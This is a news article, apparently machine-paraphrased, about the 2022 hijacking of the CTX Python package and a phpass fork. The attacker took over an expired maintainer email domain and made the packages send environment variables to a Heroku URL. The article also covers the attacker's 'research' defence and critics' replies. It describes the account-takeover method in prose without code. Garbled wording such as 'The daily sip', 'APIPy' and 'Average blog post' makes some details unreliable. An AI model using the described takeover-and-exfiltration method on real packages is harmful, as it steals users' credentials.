Security ‘researcher’ hits back at allegations of malicious CTX file downloads

They claim that all data received has been deleted

A ‘security researcher’ accused of unethical activity by the alleged hijacking of a popular open source project insists his actions were not malicious.

Last week, as previously reported by The daily sipsocial media users have alerted the Python Package Index (PyPI) repository to a potentially malicious or hacked package, CTX.

CONTEXT CTX malicious Python library removed from PyPI repository

On May 22, Reddit user SocketPuppets promoted the package online, saying it had received an update after being inactive for about eight years.

The CTX Python library was available on both GitHub and APIPy. However, it was not long before the participants of a Reddit thread pointed out that the GitHub package was not updated at the same time as the PyPI repository.

To make matters worse, the person responsible also allegedly compromised another package, phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.

Domain takeover

With approximately three million downloads combined, the Python packages had been tampered with to send environmental variables – such as AWS keys – to an external URL leading to a Heroku application.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration method was added after an author purchased a domain name for the expired email address used by the original developer, sent himself a password recovery password and took over the account.

Learn about the latest hacking news from around the world

Users who installed the package between May 14 and May 22, 2022 may have had environment variables and related credentials compromised.

SocketPuppets (account since deleted) tried to defend his actions, saying the unusual activity was due to a “new corporate account.”

The individual accused of the activity then posted a Average blog post to share their “side of the story”.

“All of these searches contain NO malicious activity,” Aydin said. “I want to show how this simple attack affects +10 million users and businesses. ALL DATA I HAVE RECEIVED IS DELETED AND NOT USED.

“Never Disclosed Responsibly”

According to Aydin, a “scraper tool” and a bot were used to support the packages. It costs $5 to register the expired domain.

Aydin added that he sent a report to bug bounty platform HackerOne on May 15, which was double-closed a day later.

Their Profile HackerOne doesn’t seem to show an associated bug report.

Talk to The daily sipSangwan said the vulnerability “was never responsibly disclosed” and “it was a real attack.”

Sangwan added, “After taking over the package, the attacker posted it on Reddit… and when other users became suspicious and I discovered another package they had compromised. The assailant came out and claimed he did it for “research”.

“Replace popular software with a stolen version that steals the password[s] of people is anything but research.

YOU MIGHT ALSO LIKE Volatile market for stolen credit card data rocked by Russia sanctions